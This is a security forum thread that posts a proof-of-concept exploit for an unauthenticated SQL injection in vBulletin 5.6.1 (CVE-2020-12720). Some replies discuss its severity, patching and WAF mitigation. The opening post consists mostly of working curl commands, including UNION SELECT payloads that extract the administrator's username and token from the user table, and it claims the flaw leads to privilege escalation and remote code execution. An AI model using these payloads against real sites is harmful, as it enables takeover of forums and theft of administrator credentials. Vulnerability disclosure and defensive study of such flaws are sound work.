Welcome!

Welcome to the 1337pwn community forums. Register now for an account.

Registration is free!

Register Now

Announcement

Collapse
No announcement yet.

vBulletin 5.6.1 Unauthenticated SQL Injection Vulnerability (PoC)

Collapse
X
 
  • Filter
  • Time
  • Show
Clear All
new posts

    vBulletin 5.6.1 Unauthenticated SQL Injection Vulnerability (PoC)

    Here is a vBulletin 5.6.1 unauthenticated SQL injection vulnerability (PoC) that was recently patched in vBulletin 5.6.1 Patch Level 1:
    Code:
    curl "https://website/vb5/ajax/api/content_attach/getIndexableContent" -H 'X-Requested-With: XMLHttpRequest' -d "nodeId[nodeid]=SQLi"
    Obtain vBulletin 5.6.1 admin user (PoC)
    Code:
    curl "https://website/vb5/ajax/api/content_infraction/getIndexableContent" -H 'X-Requested-With: XMLHttpRequest' -d "nodeId[nodeid]=1+UNION+SELECT+26,25,24,23,22,21,20,19,20,17,16,1 5,14,13,12,11,10,username,8,7,6,5,4,3,2,1+from+use r+where+userid=1--"
    Obtain vBulletin 5.6.1 admin token (PoC)
    Code:
    curl "https://website/vb5/ajax/api/content_infraction/getIndexableContent" -H 'X-Requested-With: XMLHttpRequest' -d "nodeId[nodeid]=1+UNION+SELECT+26,25,24,23,22,21,20,19,20,17,16,1 5,14,13,12,11,10,token,8,7,6,5,4,3,2,1+from+user+w here+userid=1--"
    Pre-auth SQL injection results in privilege escalation and remote code execution as admin.

    This SQL injection vulnerability was reported as CVE-2020-12720.

    #2
    Wow. This SQLi is definitely a critical vulnerability!

    Comment


      #3
      If any website runs vBulletin, they will want to patch ASAP. This vuln is severe enough that any attacker whether leveraging automated scanners or manual attacks can quickly exploit an outdated vB forum and own it instantly.

      Comment


        #4
        It's just a matter of time before an attacker writes an MSF exploit module.

        Comment


          #5
          Rest assured that we had already updated to 5.6.1 Patch Level 1 last week when it was released.

          Comment


            #6
            A good WAF should already be able to detect and mitigate this vulnerability.

            Comment

            Working...
            X